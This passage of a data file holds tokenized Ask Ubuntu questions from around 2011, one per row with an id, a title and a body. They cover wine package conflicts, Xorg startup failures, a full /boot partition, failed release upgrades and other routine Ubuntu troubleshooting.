lib32asound2 { ab } lib32bz2-1.0 { a } lib32gcc1 { ab } lib32ncurses5 { a } lib32nss-mdns { a } lib32stdc++6 { ab } lib32v4l-0 { ab } lib32z1 { a } libc6-i386 { ab } libcdt4 { a } libgraph4 { a } libgvc5 { a } libilmbase6 { a } liblqr-1-0 { a } libmagickcore3 { a } libmagickcore3-extra { a } libmagickwand3 { a } libnetpbm10 { a } libopenexr6 { a } libpathplan4 { a } netpbm { a } ttf-droid { a } ttf-symbol-replacement-wine1.3 { a } ttf-umefont { a } winbind { a } wine wine1.3 { a } wine1.3-gecko { a } winetricks { a } 0 packages upgraded , 33 newly installed , 0 to remove and 0 not upgraded . need to get 135 mb of archives . after unpacking 421 mb will be used . the following packages have unmet dependencies : libc6-i386 : depends : libc6 ( = 2.12.1-0ubuntu16 ) but 2.13-0ubuntu13 is installed . lib32gcc1 : depends : gcc-4.5-base ( = 4.5.2-2ubuntu3 ) but 4.5.2-8ubuntu4 is installed . lib32asound2 : depends : libasound2 ( = 1.0.23-2.1ubuntu2 ) but 1.0.24.1-0ubuntu5 is installed . lib32stdc++6 : depends : gcc-4.5-base ( = 4.5.2-2ubuntu3 ) but 4.5.2-8ubuntu4 is installed . lib32v4l-0 : depends : libv4l-0 ( = 0.8.1-2 ) but 0.8.3-1 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) ia32-libs [ not installed ] 2 ) lib32asound2 [ not installed ] 3 ) lib32bz2-1.0 [ not installed ] 4 ) lib32gcc1 [ not installed ] 5 ) lib32ncurses5 [ not installed ] 6 ) lib32nss-mdns [ not installed ] 7 ) lib32stdc++6 [ not installed ] 8 ) lib32v4l-0 [ not installed ] 9 ) lib32z1 [ not installed ] 10 ) libc6-i386 [ not installed ] 11 ) wine [ not installed ] 12 ) wine1.3 [ not installed ] leave the following dependencies unresolved : 13 ) wine1.3-gecko recommends wine1.3 14 ) winetricks recommends wine1.2 | wine1.3 | cxoffice5 | cxgames5 it seems the wine package has n't been updated in the repo . what should i do now ?
58457	how to add a folder to a playlist in banshee ?	now how do you add an entire folder to a playlist of banshee . say , you have a precious folder in which you have put your favorite songs one by one . how do you create a playlist for that folder ? regards raghu
58460	how can i remove the rounded edges and transparent border from a metacity theme ?	i have a problem with my current theme . when windows top border close to top panel , there 's a transparent background at the top corner ( please take a look at the attached image ) . so , how could i : remove it ? change the rounded corners ( i love the less rounded corners - like mac os x ) thanks in advance .
58463	how to fix bootchart error	bootchart throws this error message . sudo pybootchartgui no path given , trying /var/log/bootchart.tgz warning : path '/var/log/bootchart.tgz ' does not exist , ignoring . parse error : empty state : '/var/log/bootchart.tgz ' does not contain a valid bootchart
58466	what is the current status of windicators ?	this cool feature was first told to be included in 10.10 . according to this answer , they were postponed to 11.04 , but it turned out they have not appeared there . now we are after feature freeze for 11.10 , and still there is no sign of them . so what 's up with them ? i have n't heard a word about them for a long time . is this idea abandoned ? note it was initially the reason for moving the window-ops buttons to the left corner . or maybe they are under heavy development and soon will be included in 12.04 ?
58467	chmod files only in all subdirectories	please someone assist me with chmod , i have the following file structure -dir1 -- file1 -- file2 -- dir1a -- -file1a1 -- -file1a2 -- dir1b -- -file1b1 -- -file1b2 how do i chmod 655 to all files under dir1 and all subdir ? so all files will have 655 permission and all dir will remain as they were . thank you
58473	what process are started by the system ?	how to find what process are started during bootup process . are there any ways to find using any command , like one found in windows < msconfig > . for more about please read . http : //en.wikipedia.org/wiki/msconfig
58474	how does automatic login work ?	i found that one my user login for user ( hadoop ) automatically gets logged in after boot process . i wanted to know where exactly in the boot process it does .
58480	how do you setup system email to send to a gmail account ?	often when i 'm working on a terminal , i 'll see the `` you have new mail in ... '' message . i know i can see this mail by looking in my system 's mail folder , but this is inconvenient . also , if the message is important , such as a notice about low system resources , or drive problems , or a failed cron job , i may not see that message or check the system 's mail folder for weeks or more . how can i set it up so that all these messages get sent to a real email service , like gmail , which i check daily ?
58484	how to install/start ubuntu classic ?	i have installed 11.10 and i understand it does n't come with ubuntu classic but if i really want to go back and not use unity what options do i have ? can someone please guide/advise me what do i have to add/install to get ubuntu classic as an option ?
58485	synchronization of .tar.gz-file seems to constantly start all over again	i am still quite new to u1 ( using the integration in ubuntu 11.04 ) . my earlier synchronizations , though , worked fine so far ( folders outside of the ubuntu 1-folder ) . simple , comfortably etc . but then my next attempt was to synchronize a .tar.gz-file ( 1.9 gb , this time in the u1-folder ) , and here u1 seems to run into problems - and/or me ? what i observed : i have tried to upload the file now for about 4 days in a row ( computer is in use and online most of the day and during large parts of the night , too ) . it has n't finished yet . at times i got every few minutes notifications that u1 started the sync-process again , as if the connection had gone down in between . once i also caught the program disconnected , not due to any action on my part . the notifications have stopped , but instead i checked the current transfers via terminal ( u1sdtool -- current transfers ) . and the bytes written keep going up - and then a while later i am down a few digits again . the amount of u1-space that i am using according to the panel has n't changed at all . the file is nevertheless visible in my web-account , though marked as getting synchronized . from looking around a bit , i thought first that it might have to do with the file being compressed . but that problem was solved according to posts i found here . my second guess was the file size . again , this is supposed to be no problem . my third guess : i signed up for an account with 5 gb of free space , currently using 1.9 gb ... and the original free space given to users was 2 gb ... however , i did n't get any notifications that i 'd be running out of space . ( before considering buying more space , i 'd obviously want to see that things work as it is . ) now , if anyone has an idea , maybe even a solution for me , i 'd be more than glad . : ) everything else worked so smooth so far that i 'd like to stick to u1 if possible ( after some very frustrating experiences with syncplicity , for instance ) .
58486	how to remove my application 's appindicator programmatically ?	i know how to add an appindicator menu from my application , but i ca n't seem to find how to remove it but still keep my program running in the background . is there a way to do this ?
58488	x does not want to start . at all . `` no screens have a usable configuration ''	i recently installed a fresh copy of lubuntu 11.04 powerpc on my computer . i was following the instructions from this fourm post : http : //ubuntuforums.org/showthread.php ? t=1798792 all i get is the command-line prompt . i try to start x by running `` startx '' with no avail . i googled for about 2 hours and there has been no success . i have an mac g4 800mhz 832mb ram 5400rpm 10gb and 37gb seagate internal hdd . updated 2:52pm today here is the xorg.0.log : [ 1902.094 ] x.org x server 1.10.1 release date : 2011-04-15 [ 1902.104 ] x protocol version 11 , revision 0 [ 1902.114 ] build operating system : linux 2.6.35-23-powerpc64-smp ppc ubuntu [ 1902.121 ] current operating system : linux lubuntu 2.6.38-11-powerpc # 48-ubuntu fri jul 29 19:10:04 utc 2011 ppc [ 1902.129 ] kernel command line : root=uuid=940b9703-2dac-43fa-bf7e-973987bf28ee ro quiet splash [ 1902.140 ] build date : 11 august 2011 03:47:04pm [ 1902.148 ] xorg-server 2:1.10.1-1ubuntu1.2 ( for technical support please see http : //www.ubuntu.com/support ) [ 1902.156 ] current version of pixman : 0.20.2 [ 1902.165 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 1902.173 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1902.198 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu aug 25 14:50:16 2011 [ 1902.212 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 1902.223 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1902.238 ] ( == ) no layout section . using the first screen section . [ 1902.238 ] ( ** ) | -- > screen `` default screen '' ( 0 ) [ 1902.238 ] ( ** ) | | -- > monitor `` configured monitor '' [ 1902.240 ] ( ** ) | | -- > device `` configured video device '' [ 1902.241 ] ( == ) automatically adding devices [ 1902.241 ] ( == ) automatically enabling devices [ 1902.241 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1902.241 ] entry deleted from font path . [ 1902.241 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1902.241 ] entry deleted from font path . [ 1902.241 ] ( ww ) the directory `` /usr/share/fonts/x11/type1 '' does not exist . [ 1902.242 ] entry deleted from font path . [ 1902.242 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1902.242 ] entry deleted from font path . [ 1902.242 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 1902.242 ] entry deleted from font path . [ 1902.242 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/100dpi , built-ins [ 1902.242 ] ( == ) modulepath set to `` /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 1902.242 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 1902.242 ] ( ii ) loader magic : 0x101f3c20 [ 1902.242 ] ( ii ) module abi versions : [ 1902.242 ] x.org ansi c emulation : 0.4 [ 1902.243 ] x.org video driver : 10.0 [ 1902.243 ] x.org xinput driver : 12.3 [ 1902.243 ] x.org server extension : 5.0 [ 1902.245 ] ( -- ) pci : * ( 0:0:16:0 ) 1002:5046:0000:0000 rev 0 , mem @ 0x94000000/67108864 , 0x90000000/16384 , i/o @ 0x00000400/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 1902.246 ] ( ii ) open apm successful [ 1902.246 ] ( ii ) loadmodule : `` extmod '' [ 1902.249 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 1902.250 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 1902.250 ] compiled for 1.10.1 , module version = 1.0.0 [ 1902.250 ] module class : x.org server extension [ 1902.250 ] abi class : x.org server extension , version 5.0 [ 1902.250 ] ( ii ) loading extension mit-screen-saver [ 1902.250 ] ( ii ) loading extension xfree86-vidmodeextension [ 1902.250 ] ( ii ) loading extension xfree86-dga [ 1902.250 ] ( ii ) loading extension dpms [ 1902.250 ] ( ii ) loading extension xvideo [ 1902.250 ] ( ii ) loading extension xvideo-motioncompensation [ 1902.250 ] ( ii ) loading extension x-resource [ 1902.251 ] ( ii ) loadmodule : `` dbe '' [ 1902.252 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 1902.253 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 1902.253 ] compiled for 1.10.1 , module version = 1.0.0 [ 1902.253 ] module class : x.org server extension [ 1902.253 ] abi class : x.org server extension , version 5.0 [ 1902.253 ] ( ii ) loading extension double-buffer [ 1902.253 ] ( ii ) loadmodule : `` glx '' [ 1902.254 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 1902.255 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 1902.255 ] compiled for 1.10.1 , module version = 1.0.0 [ 1902.256 ] abi class : x.org server extension , version 5.0 [ 1902.256 ] ( == ) aiglx enabled [ 1902.256 ] ( ii ) loading extension glx [ 1902.256 ] ( ii ) loadmodule : `` record '' [ 1902.259 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 1902.264 ] ( ii ) module record : vendor= '' x.org foundation '' [ 1902.265 ] compiled for 1.10.1 , module version = 1.13.0 [ 1902.265 ] module class : x.org server extension [ 1902.265 ] abi class : x.org server extension , version 5.0 [ 1902.265 ] ( ii ) loading extension record [ 1902.265 ] ( ii ) loadmodule : `` dri '' [ 1902.266 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 1902.267 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 1902.267 ] compiled for 1.10.1 , module version = 1.0.0 [ 1902.267 ] abi class : x.org server extension , version 5.0 [ 1902.267 ] ( ii ) loading extension xfree86-dri [ 1902.272 ] ( ii ) loadmodule : `` dri2 '' [ 1902.273 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 1902.274 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 1902.274 ] compiled for 1.10.1 , module version = 1.2.0 [ 1902.274 ] abi class : x.org server extension , version 5.0 [ 1902.274 ] ( ii ) loading extension dri2 [ 1902.274 ] ( ii ) loadmodule : `` ati '' [ 1902.280 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 1902.280 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 1902.281 ] compiled for 1.10.1 , module version = 6.14.0 [ 1902.281 ] module class : x.org video driver [ 1902.281 ] abi class : x.org video driver , version 10.0 [ 1902.281 ] ( ii ) loadmodule : `` r128 '' [ 1902.283 ] ( ii ) loading /usr/lib/xorg/modules/drivers/r128_drv.so [ 1902.283 ] ( ii ) module r128 : vendor= '' x.org foundation '' [ 1902.283 ] compiled for 1.10.0 , module version = 6.8.1 [ 1902.283 ] module class : x.org video driver [ 1902.283 ] abi class : x.org video driver , version 10.0 [ 1902.287 ] ( ii ) r128 : driver for ati rage 128 chipsets : ati rage 128 mobility m3 le ( pci ) , ati rage 128 mobility m3 lf ( agp ) , ati rage 128 mobility m4 mf ( agp ) , ati rage 128 mobility m4 ml ( agp ) , ati rage 128 pro gl pa ( pci/agp ) , ati rage 128 pro gl pb ( pci/agp ) , ati rage 128 pro gl pc ( pci/agp ) , ati rage 128 pro gl pd ( pci ) , ati rage 128 pro gl pe ( pci/agp ) , ati rage 128 pro gl pf ( agp ) , ati rage 128 pro vr pg ( pci/agp ) , ati rage 128 pro vr ph ( pci/agp ) , ati rage 128 pro vr pi ( pci/agp ) , ati rage 128 pro vr pj ( pci/agp ) , ati rage 128 pro vr pk ( pci/agp ) , ati rage 128 pro vr pl ( pci/agp ) , ati rage 128 pro vr pm ( pci/agp ) , ati rage 128 pro vr pn ( pci/agp ) , ati rage 128 pro vr po ( pci/agp ) , ati rage 128 pro vr pp ( pci ) , ati rage 128 pro vr pq ( pci/agp ) , ati rage 128 pro vr pr ( pci ) , ati rage 128 pro vr ps ( pci/agp ) , ati rage 128 pro vr pt ( pci/agp ) , ati rage 128 pro vr pu ( pci/agp ) , ati rage 128 pro vr pv ( pci/agp ) , ati rage 128 pro vr pw ( pci/agp ) , ati rage 128 pro vr px ( pci/agp ) , ati rage 128 gl re ( pci ) , ati rage 128 gl rf ( agp ) , ati rage 128 rg ( agp ) , ati rage 128 vr rk ( pci ) , ati rage 128 vr rl ( agp ) , ati rage 128 4x se ( pci/agp ) , ati rage 128 4x sf ( pci/agp ) , ati rage 128 4x sg ( pci/agp ) , ati rage 128 4x sh ( pci/agp ) , ati rage 128 4x sk ( pci/agp ) , ati rage 128 4x sl ( pci/agp ) , ati rage 128 4x sm ( agp ) , ati rage 128 4x sn ( pci/agp ) , ati rage 128 pro ultra tf ( agp ) , ati rage 128 pro ultra tl ( agp ) , ati rage 128 pro ultra tr ( agp ) , ati rage 128 pro ultra ts ( agp ? ) , ati rage 128 pro ultra tt ( agp ? ) , ati rage 128 pro ultra tu ( agp ? ) [ 1902.294 ] ( -- ) using vt number 7 [ 1902.316 ] ( ii ) loading /usr/lib/xorg/modules/drivers/r128_drv.so [ 1902.317 ] ( ii ) r128 ( 0 ) : pci bus 0 card 16 func 0 [ 1902.317 ] ( == ) r128 ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 1902.317 ] ( ii ) r128 ( 0 ) : pixel depth = 24 bits stored in 4 bytes ( 32 bpp pixmaps ) [ 1902.317 ] ( == ) r128 ( 0 ) : default visual is truecolor [ 1902.317 ] ( ii ) r128 ( 0 ) : vgaaccess option set to false , vga module load skipped [ 1902.317 ] ( == ) r128 ( 0 ) : rgb weight 888 [ 1902.317 ] ( ii ) r128 ( 0 ) : using 8 bits per rgb ( 8 bit dac ) [ 1902.318 ] ( ** ) r128 ( 0 ) : using framebuffer device [ 1902.318 ] ( ii ) loading sub module `` fbdevhw '' [ 1902.318 ] ( ii ) loadmodule : `` fbdevhw '' [ 1902.319 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 1902.325 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 1902.325 ] compiled for 1.10.1 , module version = 0.0.2 [ 1902.326 ] abi class : x.org video driver , version 10.0 [ 1902.326 ] ( ee ) unable to find a valid framebuffer device [ 1902.327 ] ( ee ) r128 ( 0 ) : failed to open framebuffer device , consult warnings and/or errors above for possible reasons ( you may have to look at the server log to see warnings ) [ 1902.327 ] ( ii ) unloadmodule : `` r128 '' [ 1902.327 ] ( ii ) unloading r128 [ 1902.327 ] ( ii ) unloadmodule : `` fbdevhw '' [ 1902.327 ] ( ii ) unloading fbdevhw [ 1902.327 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 1902.332 ] fatal server error : [ 1902.332 ] no screens found [ 1902.332 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 1902.333 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 1902.333 ] [ 1902.384 ] ddxsiggiveup : closing log my xorg.conf file : section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 24-82 vertrefresh 56-85 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' subsection `` display '' modes `` 800x600 '' `` 1024x768 '' endsubsection endsection section `` dri '' mode 0666 endsection my monitor is a sony trinitron multiscan 20se ii . i 've been trying to install linux for two week and i 'm not giving up yet ! almost , though
58492	annotating packages at installation to ease maintenance with apt / aptitude	i manage my packages with aptitude . i occasionally go through my list of packages , removing obsolete applications ( in the sense that i do not want to use them any more ) . for example , while i have a limited number of development libraries on my system that i do want installed permanently , a lot were just there to allow me to compile some program from source once , and a long time ago . to make those clean-up sessions take unneeded dependencies into account , i use the markauto command of aptitude . the problem is that i sometimes can no longer trust my memory to make the difference between packages that are transient , and things that i need to keep ( because , e.g. , i will need them to recompile something tomorrow ) . the situation is even more acute when i share administration duties over a server with another admin . alternatively , i wish i would have the discipline to clean up all packages that are transient after use , but history proves it 's too much to hope for . hence : is there a tool that , like markauto would let me annotate packages at installation time , not with a flag but with a simple comment string saying why they are being installed ? ideally , that comment would be retrievable with aptitude ( or synaptic , or whatever kids these days use to manage packages ) . ideally , this would be something that me and another admin on the same server can collaborate on , and it would thus , for example , benefit from the same lock-management system as the package-tree already has .
58494	`` boot '' has 0 bytes	the volume `` boot '' has only 0 bytes disk space remaining . you can free up disk space by removing unused programs or files , or by moving files to another disk or partition . this is what i have in `` boot '' : /boot/abi-2.6.32-21-generic /boot/abi-2.6.32-22-generic /boot/abi-2.6.32-24-generic /boot/abi-2.6.32-25-generic /boot/abi-2.6.32-26-generic /boot/abi-2.6.32-27-generic /boot/abi-2.6.32-28-generic /boot/abi-2.6.32-30-generic /boot/abi-2.6.32-31-generic /boot/abi-2.6.32-32-generic /boot/abi-2.6.32-33-generic /boot/config-2.6.32-21-generic /boot/config-2.6.32-22-generic /boot/config-2.6.32-24-generic /boot/config-2.6.32-25-generic /boot/config-2.6.32-26-generic /boot/config-2.6.32-27-generic /boot/config-2.6.32-28-generic /boot/config-2.6.32-30-generic /boot/config-2.6.32-31-generic /boot/config-2.6.32-32-generic /boot/config-2.6.32-33-generic /boot/initrd.img-2.6.32-21-generic /boot/initrd.img-2.6.32-22-generic /boot/initrd.img-2.6.32-24-generic /boot/initrd.img-2.6.32-25-generic /boot/initrd.img-2.6.32-26-generic /boot/initrd.img-2.6.32-27-generic /boot/initrd.img-2.6.32-28-generic /boot/initrd.img-2.6.32-30-generic /boot/initrd.img-2.6.32-31-generic /boot/initrd.img-2.6.32-32-generic /boot/initrd.img-2.6.32-33-generic /boot/memtest86+.bin /boot/system.map-2.6.32-21-generic /boot/system.map-2.6.32-22-generic /boot/system.map-2.6.32-24-generic /boot/system.map-2.6.32-25-generic /boot/system.map-2.6.32-26-generic /boot/system.map-2.6.32-27-generic /boot/system.map-2.6.32-28-generic /boot/system.map-2.6.32-30-generic /boot/system.map-2.6.32-31-generic /boot/system.map-2.6.32-32-generic /boot/system.map-2.6.32-33-generic /boot/vmcoreinfo-2.6.32-21-generic /boot/vmcoreinfo-2.6.32-22-generic /boot/vmcoreinfo-2.6.32-24-generic /boot/vmcoreinfo-2.6.32-25-generic /boot/vmcoreinfo-2.6.32-26-generic /boot/vmcoreinfo-2.6.32-27-generic /boot/vmcoreinfo-2.6.32-28-generic /boot/vmcoreinfo-2.6.32-30-generic /boot/vmcoreinfo-2.6.32-31-generic /boot/vmcoreinfo-2.6.32-32-generic /boot/vmcoreinfo-2.6.32-33-generic /boot/vmlinuz-2.6.32-21-generic /boot/vmlinuz-2.6.32-22-generic /boot/vmlinuz-2.6.32-24-generic /boot/vmlinuz-2.6.32-25-generic /boot/vmlinuz-2.6.32-26-generic /boot/vmlinuz-2.6.32-27-generic /boot/vmlinuz-2.6.32-28-generic /boot/vmlinuz-2.6.32-30-generic /boot/vmlinuz-2.6.32-31-generic /boot/vmlinuz-2.6.32-32-generic /boot/vmlinuz-2.6.32-33-generic can i delete these ? i have not deleted these yet because i do n't want to restart to find that i have lost my install ... i am using ubuntu 10.04 .
58499	problem running windows software on wine	i installed a windows game successfully , however when i tried to run it , the software is asking me to insert the cd into the cd-rom , which i did . but then after i press ok , nothing happen . i 'm guessing somehow game unable to access the cd-rom . what do i need to do so i can get this game to work ? fyi , when i insert a cd , the content of the cd automatically show up under /media/ . there is a /cdrom/ folder , but it 's empty . please help anyone ? thanks
58501	ca n't launch gnome-terminal from anacron job	a few releases ago ( lucid lynx ) i wrote a backup shell script task that was executed as an anacron job every week . it worked fine then . however , it fails in natty . the idea was simple . the script referenced by the anacron job just launched gnome-terminal with the actual backup script passed in as the argument . so a new terminal window popped up showing the script output . here you are my anacron file : http : //paste.ubuntu.com/673965/ and here , the launcher : http : //paste.ubuntu.com/673963/ any idea about why what once worked , stopped working ? and more important , what to do to make it work again ? note : i would appreciate tested solutions when possible ...
58506	unity does not start despite having worked for several months	my computer has been able to run unity with no problems since i installed 11.04 a few months ago . the unity_support_test script have previously always given a firm yes to the question if unity is supported . my graphics card is a nvidia geforce gt 330m and i have installed the proprietary driver version 270.41.06 . however , unity did not start today when i started my computer and logged in , instead i got the `` ubuntu classic '' interface . i have restarted a few times and been extra careful to choose `` ubuntu '' as session and not `` ubuntu classic '' or any other non-unity alternative , but the result is the same every time , ubuntu classic and no unity . there were some updates yesterday , but i did not recognize anything interface related . i have read some other questions and answers here , but i did not find anything useful . the only recommendation that i have followed was to install the compizconfig settings manager and to check if the ubuntu unity plugin was activated , but the plugin was already active as it should be . as a final check before posting this question , i runned the unity_support_test script and to my surprise the answer was not `` yes '' but instead the following : mghg @ vaio-ubuntu : ~ $ /usr/lib/nux/unity_support_test -p x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 138 ( nv-glx ) minor opcode of failed request : 4 ( ) resource id in failed request : 0x1ff serial number of failed request : 31 current serial number in output stream : 31 please help me get back to unity !
58508	fakeroot debian/rules clean gave error exit status 126 when trying to compile source code	using the instructions found here , i have been trying to create source code from a python file using debhelper . i have reached the final step , where you have to enter : $ debuild -us -uc however , when i enter this command , i get the output : /usr/bin/fakeroot : debian/rules : /usr/bin/make : bad interpreter : no such file or directory dpkg-buildpackage : error : fakeroot debian/rules clean gave error exit status 126 how can i get this to compile correctly ? edit : here are the contents of my debian/rules file : # ! /usr/bin/make -f % : dh $ @
58510	openvpn conflicts with 3g mobile broadband	i 'm using ubuntu 11.04 2.6.38-8-generic fresh install . the usb 3g dongle ( onda mt833up ) is recognised by the networkmanager and works fine until i install the openvpn client ( sudo apt-get install network-manager-openvpn-gnome ) ... obviously removing the opnvpn client is not an option ... any suggestion from anybody ? thank you !
58522	how can i determine x resolution from cli without randr ?	does anyone know of a way to determine the current x resolution from the command line , without using randr ?
58523	eclipse crashes at startup with error log	i have installed eclipse through the ubuntu software center on my new ubuntu 11.04 laptop . i tried first using the stock openjdk-6-jdk package with it , but found it crashing on startup , so i removed openjdk6-jdk and eclipse and restarted with sun-java6-jdk package , but still got the same error . the error from the error log is as follows : ! session 2011-08-24 16:40:55.749 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=m20100211-1343 java.version=1.6.0_22 java.vendor=sun microsystems inc. bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2011-08-24 16:40:56.738 ! message startup error ! stack 1 java.lang.illegalargumentexception : invalid qualifier : 3+ at org.osgi.framework.version.validate ( version.java:188 ) at org.osgi.framework.version. < init > ( version.java:92 ) at org.eclipse.osgi.framework.internal.core.framework.initializeproperties ( framework.java:361 ) at org.eclipse.osgi.framework.internal.core.framework.initialize ( framework.java:196 ) at org.eclipse.osgi.framework.internal.core.framework. < init > ( framework.java:157 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.startup ( eclipsestarter.java:286 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:175 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:616 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:559 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:514 ) at org.eclipse.equinox.launcher.main.run ( main.java:1311 )
58528	what 's the difference between gdm and lightdm ?	what is the difference between gdm and lightdm ? how can one switch between them . i mean if i have selected lightdm during installation process , will i be able switch to gdm ?
58529	resize partition without affecting other oses in dual-boot	i wanted to resize ( increase or decrease the partition size ) the existing ubuntu partition without affecting it and the other os ( es ) installed in the machine .
58532	i 'm getting this error during upgrade from 11.04 to latest release	are there any unknown side-affects on ubuntu for these sorts of errors occurring during upgrade . to upgrade i did the below command from ubuntu 11.04 sudo do-release-upgrade remainder of file ignored error processing line 2 of /usr/lib/python2.7/dist- packages/zope.app.zopeappgenerations-3.5.1-nspkg.pth : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 157 , in addpackage exec line file `` '' , line 1 , in keyerror : 'zope' remainder of file ignored running hooks in /etc/ca-certificates/update.d ... . updating keystore /etc/ssl/certs/java/cacerts ... error adding /etc/ssl/certs/acedicom_root.pem error adding /etc/ssl/certs/ac_raíz_certicámara_s.a..pem error adding /etc/ssl/certs/applicationca_-_japanese_government.pem error adding /etc/ssl/certs/autoridad_de_certificacion_firmaprofesional_cif_a62634068.pem error adding /etc/ssl/certs/buypass_class_2_ca_1.pem error adding /etc/ssl/certs/buypass_class_3_ca_1.pem error adding /etc/ssl/certs/ca_disig.pem error adding /etc/ssl/certs/certigna.pem error adding /etc/ssl/certs/certsign_root_ca.pem error adding /etc/ssl/certs/chambers_of_commerce_root_-_2008.pem error adding /etc/ssl/certs/cnnic_root.pem error adding /etc/ssl/certs/comsign_ca.pem error adding /etc/ssl/certs/comsign_secured_ca.pem error adding /etc/ssl/certs/cybertrust_global_root.pem error adding /etc/ssl/certs/deutsche_telekom_root_ca_2.pem error adding /etc/ssl/certs/ebg_elektronik_sertifika_hizmet_sağlayıcısı.pem error adding /etc/ssl/certs/e-guven_kok_elektronik_sertifika_hizmet_saglayicisi.pem error adding /etc/ssl/certs/epki_root_certification_authority.pem error adding /etc/ssl/certs/geotrust_primary_certification_authority_-_g2.pem error adding /etc/ssl/certs/geotrust_primary_certification_authority_-_g3.pem error adding /etc/ssl/certs/global_chambersign_root_-_2008.pem error adding /etc/ssl/certs/globalsign_root_ca_-_r3.pem error adding /etc/ssl/certs/hongkong_post_root_ca_1.pem error adding /etc/ssl/certs/igc_a.pem error adding /etc/ssl/certs/izenpe.com.pem error adding /etc/ssl/certs/juur-sk.pem error adding /etc/ssl/certs/microsec_e-szigno_root_ca_2009.pem error adding /etc/ssl/certs/microsec_e-szigno_root_ca.pem error adding /etc/ssl/certs/netlock_arany_=class_gold=_főtanúsítvány.pem error adding /etc/ssl/certs/oiste_wisekey_global_root_ga_ca.pem error adding /etc/ssl/certs/securesign_rootca11.pem
58536	upgrade failed from 11.04 to next available release	my current upgrade from 11.04 to next release failed . is any pointers or things i should do to make sure the existing one is stable errors were encountered while processing : ubuntu-desktop exception during pm.doinstall ( ) : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) gtk-message : failed to load module `` gail '' gtk-message : failed to load module `` atk-bridge '' gtk-message : failed to load module `` gail-gnome '' /usr/lib/python2.7/dist-packages/lazr/restfulclient/init.py:19 : userwarning : module paste was already imported from none , but /usr/lib/python2.7/dist-packages is being added to sys.path import pkg_resources gconf error : configuration server could n't be contacted : d-bus error : method `` getdefaultdatabase '' with signature `` '' on interface `` org.gnome.gconf.server '' does n't exist gtk-message : failed to load module `` atk-bridge '' gtk-message : failed to load module `` gail-gnome '' created new window in existing browser session . gconf error : configuration server could n't be contacted : d-bus error : method `` getdefaultdatabase '' with signature `` '' on interface `` org.gnome.gconf.server '' does n't exist could not install the upgrades the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . gtk-message : failed to load module `` atk-bridge '' gtk-message : failed to load module `` gail-gnome '' created new window in existing browser session . dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on at-spi2-core ; however : package at-spi2-core is not installed . ubuntu-desktop depends on libatk-adaptor ; however : package libatk-adaptor is not installed . dpkg : error processing ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : ubuntu-desktop
58539	how to use ssh ( ssh & rsync commands ) ?	how can i ssh with a remote server so i can browse files and edit them . i have a username and password to use .
58540	why is start menu button not showing up ?	why ubuntu start button not showing up in ubuntu 11.10 ; while upgrade from 11.04 to 11.10 it throwed me upgrade not successful , but i 'm able to login as 11.10 , now that i see there is no ubuntu start button .
